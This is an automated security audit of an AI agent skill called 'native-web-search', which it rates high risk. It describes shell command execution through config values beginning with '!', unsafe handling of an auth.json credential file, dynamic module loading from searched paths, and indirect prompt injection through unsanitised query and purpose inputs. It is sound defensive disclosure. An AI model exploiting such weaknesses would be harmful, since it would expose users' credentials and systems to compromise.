native-web-search

Fail

Audited by Gen Agent Trust Hub on Feb 27, 2026

Risk Level: HIGHCOMMAND_EXECUTIONCREDENTIALS_UNSAFEREMOTE_CODE_EXECUTIONPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The function resolveConfigValue in search.mjs utilizes execSync to execute shell commands if a configuration string starts with an exclamation mark (!). Since this function is used to resolve API keys from the auth.json file, an attacker who can influence this file can achieve arbitrary command execution.
  • [CREDENTIALS_UNSAFE]: The script explicitly reads from and writes to ~/.pi/agent/auth.json. This file is known to contain sensitive authentication material, including long-lived API keys and OAuth refresh tokens for AI services.
  • [DYNAMIC_EXECUTION]: The loadPiAi function uses dynamic import() to load the @mariozechner/pi-ai module from computed paths. It searches through several locations including environment variables, parent node_modules directories (walking up 8 levels from the current working directory), and hardcoded development paths. This behavior can be exploited to execute malicious code if the script is run in a directory with a compromised node_modules tree.
  • [INDIRECT_PROMPT_INJECTION]: The skill is vulnerable to prompt injection via user-controlled inputs.
  • Ingestion points: The query and purpose variables are read directly from command-line arguments (process.argv).
  • Boundary markers: No delimiters or instructions to ignore embedded commands are present in the buildUserPrompt function.
  • Capability inventory: The script has the capability to perform network requests via fetch, execute shell commands via execSync, and write to the filesystem via writeFileSync.
  • Sanitization: There is no sanitization or escaping of the query or purpose strings before they are interpolated into the final prompt sent to the LLM.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 27, 2026, 09:41 AM